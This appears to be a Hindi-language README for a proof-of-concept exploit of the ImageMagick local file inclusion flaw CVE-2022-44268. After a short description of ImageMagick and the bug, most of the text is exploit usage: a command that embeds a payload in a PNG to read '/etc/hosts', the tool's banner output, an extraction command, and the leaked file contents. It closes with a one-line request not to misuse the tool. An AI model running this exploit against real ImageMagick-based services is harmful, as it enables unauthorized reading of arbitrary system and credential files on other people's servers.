
दुर्भावनापूर्ण PNG फ़ाइलें उत्पन्न करता है ताकि ImageMagick LFI भेद्यता (CVE-2022-44268) का शोषण करके मनमानी फ़ाइल पढ़ी जा सके, साथ ही प्रमाण-अवधारणा के लिए निष्कर्षण स्क्रिप्ट भी शामिल है।
ImageMagick एक मुफ्त और ओपन-सोर्स क्रॉस-प्लेटफॉर्म सॉफ्टवेयर सूट है जो रास्टर इमेज और वेक्टर इमेज फाइलों को प्रदर्शित करने, रूपांतरित करने और संपादित करने के लिए उपयोग किया जाता है। यह 200 से अधिक इमेज फ़ाइल प्रारूपों को पढ़ और लिख सकता है। ImageMagick Apache License 2.0 के तहत लाइसेंस प्राप्त है। यह कमांड-लाइन टूल्स के रूप में, साथ ही C API और C++ क्लासेस के एक सेट के रूप में उपलब्ध है। Wikipedia
ImageMagick संस्करण 7.1.0-40 और उससे नीचे लोकल फ़ाइल इन्क्लूज़न भेद्यता के प्रति संवेदनशील हैं। यह भेद्यता उपयोगकर्ता द्वारा प्रदत्त इनपुट के अनुचित सत्यापन के कारण उत्पन्न होती है। एक हमलावर एक निर्मित PNG फ़ाइल को लक्ष्य पर भेजकर इस भेद्यता का शोषण कर सकता है। इस भेद्यता के सफल शोषण से हमलावर लक्ष्य सिस्टम पर मनमानी फ़ाइलें पढ़ सकता है।
इसकी खोज करने वाले शोधकर्ताओं को श्रेय:
ImageMagick 7.1.0-40 का लाभ उठाने के लिए एक दुर्भावनापूर्ण PNG बनाएं:
pip install Pillow)generate.py के साथ PNG तैयार करना:
python3 generate.py -i input.png -f "/etc/hosts" -o exploit.png
______ __ _____ ______
| _ \ \ / / | __ \ | ____|
| |_) \ \_/ / | |__) |__ __ _ ______| |__ _ __ ___ __ _
| _ < \ / | ___/ _ \ / _` |______| __| '__/ _ \ / _` |
| |_) | | | | | | (_) | (_| | | | | | | (_) | (_| |
|____/ |_| |_| \___/ \__, | |_| |_| \___/ \__, |
__/ | __/ |
|___/ |___/
[*] ImageMagick LFI Exploit
[*] Embedding Payload to read the target file
[*] Exploit PNG generated: exploit.png
python3 extract.py downloaded_img.png
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
अस्वीकरण: कृपया अच्छे बनो, इसका उपयोग बुरे कार्यों के लिए न करें।